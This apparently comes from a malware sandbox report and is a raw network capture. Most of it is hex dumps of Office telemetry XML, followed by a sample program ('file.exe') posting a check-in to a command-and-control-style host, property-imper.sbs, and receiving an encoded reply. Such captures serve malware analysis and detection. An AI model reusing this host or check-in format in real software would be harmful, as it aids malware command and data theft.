                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:21 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                        2024-11-24 04:11:21 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                                                                                                        Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                                                                                                                                        2024-11-24 04:11:21 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                                                                                                                                        Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                                                                                                                                        2024-11-24 04:11:21 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                                                                                                                                        Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                                                                                                                                        2024-11-24 04:11:21 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                                                                                                                                        Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                                                                                                                                        2024-11-24 04:11:21 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                                                                                                                                        Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                                                                                                                                        2024-11-24 04:11:21 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                                                                                                                                        Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                                                                                                        2024-11-24 04:11:21 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                                                                                                        2024-11-24 04:11:21 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                                                                                                        2024-11-24 04:11:21 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                                                                                                                                        Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.749705104.21.33.1164437416C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:21 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 53
                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                        2024-11-24 04:11:21 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                        2024-11-24 04:11:22 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:22 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=ltaku41n6sr5fi7l4ccig0c8on; expires=Wed, 19-Mar-2025 21:58:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2BT8lBfhmmIndo5mxGud9zlT1fx3YTuEt%2B13%2FOFVFOFkSLN2oCOhiOdGj8rTeIJ8R99SOUb3sBcAwjaWCQbJ%2Ftcp0%2Bdggs48Jb0K4dZ03jmzei0O2K7h9Y2y9o%2F9wjfTjqCEQ20%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e768df69846de99-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1544973&cwnd=149&unsent_bytes=0&cid=b5334ec4afb59b9d&ts=693&x=0"
                                                                                                                                                                        2024-11-24 04:11:22 UTC350INData Raw: 31 64 38 61 0d 0a 2b 52 39 57 48 4b 65 59 48 39 61 32 4a 54 30 39 36 62 73 47 65 51 49 4b 63 46 35 61 6d 79 38 35 58 34 54 6a 46 74 73 50 2f 6f 71 43 50 53 41 2b 6e 61 77 7a 39 4d 56 41 48 77 65 64 79 58 4d 63 4c 69 67 52 4f 6e 69 68 53 56 67 7a 39 34 59 36 2b 58 6d 54 71 4d 4e 35 4e 33 44 55 2f 54 50 30 30 31 30 66 42 37 4c 41 4a 42 78 73 4b 45 70 38 50 2f 46 4e 57 44 50 6d 67 6e 32 30 66 35 4c 70 6b 58 4d 78 64 4d 4c 37 65 37 66 61 53 46 68 59 6a 4e 70 73 46 32 74 6e 47 44 4e 34 74 77 31 63 4a 61 62 5a 4e 4a 5a 71 69 75 75 30 66 69 56 33 68 65 55 7a 72 5a 52 41 55 78 2f 54 6d 57 63 63 59 47 59 57 4f 6a 48 7a 52 31 45 37 35 34 64 38 71 32 61 59 34 70 46 39 4d 6e 58 49 38 6d 2b 36 30 45 39 54 58 6f 62 61 4a 46 55 67 62 77 70 38 59 4c 6b 65 61 54 37 33 6b
                                                                                                                                                                        Data Ascii: 1d8a+R9WHKeYH9a2JT096bsGeQIKcF5amy85X4TjFtsP/oqCPSA+nawz9MVAHwedyXMcLigROnihSVgz94Y6+XmTqMN5N3DU/TP0010fB7LAJBxsKEp8P/FNWDPmgn20f5LpkXMxdML7e7faSFhYjNpsF2tnGDN4tw1cJabZNJZqiuu0fiV3heUzrZRAUx/TmWccYGYWOjHzR1E754d8q2aY4pF9MnXI8m+60E9TXobaJFUgbwp8YLkeaT73k
                                                                                                                                                                        2024-11-24 04:11:22 UTC1369INData Raw: 4d 6e 44 45 39 33 32 6d 33 45 78 55 57 70 6e 53 62 52 5a 74 61 42 38 32 4e 2f 70 4e 58 44 66 73 6a 6e 36 39 59 4a 48 75 6d 33 31 30 4d 49 58 39 5a 66 53 4d 42 33 78 61 6d 39 35 6f 44 53 4a 53 55 69 4e 32 34 41 31 63 4d 61 62 5a 4e 4c 46 6f 6e 2b 75 51 63 6a 64 32 7a 75 68 39 70 74 4a 4b 57 6b 32 4e 33 47 6f 52 59 33 6f 59 4d 6a 37 36 52 46 41 30 34 34 5a 77 2b 53 50 63 37 34 4d 39 62 44 37 6b 39 33 61 34 33 6c 42 66 48 35 53 58 66 56 74 6e 5a 46 4a 6b 65 50 31 4d 58 7a 7a 69 6a 33 71 39 59 5a 72 6d 6c 6e 49 79 64 4d 58 39 64 37 7a 63 52 6c 4a 55 68 4e 6c 68 46 6d 52 75 48 6a 30 39 75 51 4d 62 4f 76 37 42 4c 50 6c 44 6d 2b 75 4a 50 77 46 39 79 2f 52 36 6f 70 52 59 45 55 62 4c 33 6d 68 62 4f 43 67 63 4f 54 66 72 54 45 6b 34 36 4a 4e 34 76 47 75 52 36 35 56
                                                                                                                                                                        Data Ascii: MnDE932m3ExUWpnSbRZtaB82N/pNXDfsjn69YJHum310MIX9ZfSMB3xam95oDSJSUiN24A1cMabZNLFon+uQcjd2zuh9ptJKWk2N3GoRY3oYMj76RFA044Zw+SPc74M9bD7k93a43lBfH5SXfVtnZFJkeP1MXzzij3q9YZrmlnIydMX9d7zcRlJUhNlhFmRuHj09uQMbOv7BLPlDm+uJPwF9y/R6opRYEUbL3mhbOCgcOTfrTEk46JN4vGuR65V
                                                                                                                                                                        2024-11-24 04:11:22 UTC1369INData Raw: 2f 52 36 6f 70 52 59 45 55 62 4c 33 6d 68 62 4f 43 67 65 4e 54 6a 79 52 31 38 39 34 59 78 78 75 6d 71 66 35 5a 78 33 4f 6e 6e 42 39 6e 53 35 30 6b 64 59 57 34 37 4c 59 52 4a 73 5a 46 4a 79 65 50 35 56 47 32 57 6d 72 6e 4f 76 62 72 50 72 69 6e 52 30 59 59 76 6a 50 62 50 59 42 77 63 66 6a 4e 78 73 45 47 5a 67 45 69 34 39 39 30 5a 61 4e 2b 43 41 65 62 56 72 6e 4f 6d 62 65 7a 68 2b 77 76 31 76 70 74 46 42 54 56 58 4c 6c 79 51 63 65 43 68 4b 66 41 37 70 57 6b 6f 72 70 4c 52 33 74 32 4f 62 2f 74 74 69 65 6d 65 46 2f 58 48 30 6a 41 64 55 58 34 66 65 62 42 31 6b 59 42 30 7a 4d 65 74 4d 56 7a 50 30 68 6e 53 77 59 35 50 6b 6b 6e 41 7a 63 38 37 77 63 4c 44 54 52 68 38 52 79 39 35 38 57 7a 67 6f 4a 43 77 31 39 57 4e 51 4d 65 2f 42 61 2f 64 30 33 4f 2b 58 50 57 77 2b
                                                                                                                                                                        Data Ascii: /R6opRYEUbL3mhbOCgeNTjyR1894Yxxumqf5Zx3OnnB9nS50kdYW47LYRJsZFJyeP5VG2WmrnOvbrPrinR0YYvjPbPYBwcfjNxsEGZgEi4990ZaN+CAebVrnOmbezh+wv1vptFBTVXLlyQceChKfA7pWkorpLR3t2Ob/ttiemeF/XH0jAdUX4febB1kYB0zMetMVzP0hnSwY5PkknAzc87wcLDTRh8Ry958WzgoJCw19WNQMe/Ba/d03O+XPWw+
                                                                                                                                                                        2024-11-24 04:11:22 UTC1369INData Raw: 76 56 51 31 70 61 6a 39 35 67 48 57 38 6f 58 48 77 2f 34 51 30 44 66 63 6d 6d 51 66 74 4d 70 71 69 45 4d 79 30 2b 77 76 59 39 37 4a 52 4c 58 46 4f 44 31 6d 49 53 62 47 49 62 4e 7a 54 79 53 56 63 30 34 34 64 31 76 47 69 64 37 4a 64 33 4d 6e 33 47 39 58 4b 37 33 41 63 52 48 34 7a 42 4a 45 4d 67 54 51 55 33 4e 76 38 4e 52 48 50 2f 77 58 4f 31 4c 63 53 6f 6c 33 51 79 65 4d 44 32 66 4c 4c 63 51 6c 64 62 69 74 39 69 47 47 39 73 46 7a 30 33 2f 55 46 56 4e 2b 65 41 65 4c 4a 69 6c 2b 33 62 4d 33 52 35 33 62 6f 6c 39 4f 56 45 53 55 69 62 31 53 51 45 4c 6e 46 53 4f 7a 53 35 46 52 73 38 39 49 74 2b 74 32 69 54 37 5a 68 79 4d 33 50 44 39 6e 65 39 33 45 46 51 56 70 6e 61 61 42 56 6e 5a 68 34 79 4e 66 4e 4f 56 6e 32 6f 77 58 4f 68 4c 63 53 6f 74 33 6f 35 55 4d 37 32 65
                                                                                                                                                                        Data Ascii: vVQ1paj95gHW8oXHw/4Q0DfcmmQftMpqiEMy0+wvY97JRLXFOD1mISbGIbNzTySVc044d1vGid7Jd3Mn3G9XK73AcRH4zBJEMgTQU3Nv8NRHP/wXO1LcSol3QyeMD2fLLcQldbit9iGG9sFz03/UFVN+eAeLJil+3bM3R53bol9OVESUib1SQELnFSOzS5FRs89It+t2iT7ZhyM3PD9ne93EFQVpnaaBVnZh4yNfNOVn2owXOhLcSot3o5UM72e
                                                                                                                                                                        2024-11-24 04:11:22 UTC1369INData Raw: 4e 48 38 57 5a 59 77 4d 67 4d 46 49 4b 50 2b 6c 64 57 48 2f 58 6c 33 65 76 5a 70 48 6b 32 32 4a 36 5a 34 58 39 63 66 53 4d 42 31 6c 51 67 74 70 72 47 6d 6c 6b 48 7a 6b 78 2f 45 78 64 4f 65 79 4c 64 4c 39 72 6e 65 32 52 66 6a 56 30 7a 50 31 31 73 39 64 56 48 78 48 4c 33 6e 78 62 4f 43 67 37 4f 79 72 33 58 52 73 69 71 4a 67 30 76 6d 48 63 73 4e 74 35 50 6e 48 42 2f 58 47 79 30 55 46 53 58 6f 54 59 5a 42 52 6b 59 78 73 36 4f 66 52 49 56 6a 6e 30 69 33 2b 32 59 5a 58 6b 6c 6a 31 36 50 73 4c 69 50 65 79 55 64 6c 4a 52 68 64 35 79 57 33 38 6d 43 33 77 2f 39 51 30 44 66 65 65 4e 65 37 70 69 6e 2b 75 61 64 79 5a 73 79 66 4e 31 73 64 68 4d 55 56 6d 5a 33 32 73 53 59 32 73 62 4f 7a 44 31 52 31 67 36 70 73 38 30 76 6e 58 63 73 4e 74 65 49 32 37 49 75 6d 4c 36 7a 51
                                                                                                                                                                        Data Ascii: NH8WZYwMgMFIKP+ldWH/Xl3evZpHk22J6Z4X9cfSMB1lQgtprGmlkHzkx/ExdOeyLdL9rne2RfjV0zP11s9dVHxHL3nxbOCg7Oyr3XRsiqJg0vmHcsNt5PnHB/XGy0UFSXoTYZBRkYxs6OfRIVjn0i3+2YZXklj16PsLiPeyUdlJRhd5yW38mC3w/9Q0DfeeNe7pin+uadyZsyfN1sdhMUVmZ32sSY2sbOzD1R1g6ps80vnXcsNteI27IumL6zQ
                                                                                                                                                                        2024-11-24 04:11:22 UTC1369INData Raw: 33 6d 49 56 63 6d 30 55 4d 7a 66 77 52 46 38 31 35 59 46 77 76 57 71 5a 36 35 64 32 4d 33 33 4b 2f 6e 53 36 33 55 67 66 45 63 76 65 66 46 73 34 4b 44 4d 6e 4f 2f 56 41 47 79 4b 6f 6d 44 53 2b 59 64 79 77 32 33 45 36 65 38 58 77 65 37 44 52 51 56 56 61 69 39 4a 6e 46 47 52 75 46 6a 4d 34 38 6b 52 61 4f 2b 4f 4c 66 37 39 67 6e 2b 36 64 50 58 6f 2b 77 75 49 39 37 4a 52 6e 52 46 4b 48 33 69 51 45 4c 6e 46 53 4f 7a 53 35 46 52 73 32 36 6f 56 7a 75 57 43 66 34 4a 35 35 50 6e 76 46 38 6d 2b 38 31 45 42 4e 54 59 76 51 59 52 64 6a 61 42 59 36 4d 66 39 4f 58 33 32 6f 77 58 4f 68 4c 63 53 6f 74 6e 45 7a 56 38 4c 68 50 61 75 61 58 68 39 59 68 35 6b 38 57 32 46 6a 47 44 4d 31 2b 6b 74 59 4e 75 4f 4c 64 62 35 6c 6b 66 71 59 63 6a 74 36 78 66 56 37 73 74 56 49 57 56 69
                                                                                                                                                                        Data Ascii: 3mIVcm0UMzfwRF815YFwvWqZ65d2M33K/nS63UgfEcvefFs4KDMnO/VAGyKomDS+Ydyw23E6e8Xwe7DRQVVai9JnFGRuFjM48kRaO+OLf79gn+6dPXo+wuI97JRnRFKH3iQELnFSOzS5FRs26oVzuWCf4J55PnvF8m+81EBNTYvQYRdjaBY6Mf9OX32owXOhLcSotnEzV8LhPauaXh9Yh5k8W2FjGDM1+ktYNuOLdb5lkfqYcjt6xfV7stVIWVi
                                                                                                                                                                        2024-11-24 04:11:22 UTC375INData Raw: 57 4d 76 4c 41 49 66 37 30 64 63 4c 65 47 57 65 2f 6b 6a 33 4f 66 62 4a 51 30 2b 7a 50 31 6d 70 63 4a 4b 54 31 6a 4c 35 69 70 62 65 43 68 4b 66 41 33 36 51 31 55 36 38 4a 41 35 6e 6e 75 57 37 34 74 36 49 33 47 46 74 44 32 79 6c 42 38 4d 45 63 76 64 64 56 73 34 4f 45 42 6e 62 61 6f 61 43 32 2f 35 7a 32 33 35 65 39 79 77 79 54 4e 30 62 49 57 69 50 66 50 58 56 55 31 5a 69 4d 39 6e 58 46 35 57 4e 53 59 31 2f 31 70 4b 41 39 69 47 62 72 52 72 69 2f 6e 58 61 44 64 77 79 2f 31 72 39 4a 6f 48 55 42 2f 54 34 43 52 54 49 46 64 63 66 43 43 35 46 52 73 49 35 59 39 36 76 6e 75 4e 70 62 78 6e 4f 58 6a 53 36 7a 33 36 6c 45 45 66 42 39 75 58 4a 42 39 78 4b 45 70 73 61 71 49 59 43 47 71 32 30 32 76 33 64 4e 7a 2b 32 79 56 6d 4d 49 58 6f 50 65 79 55 41 46 78 4e 6d 64 39 6e
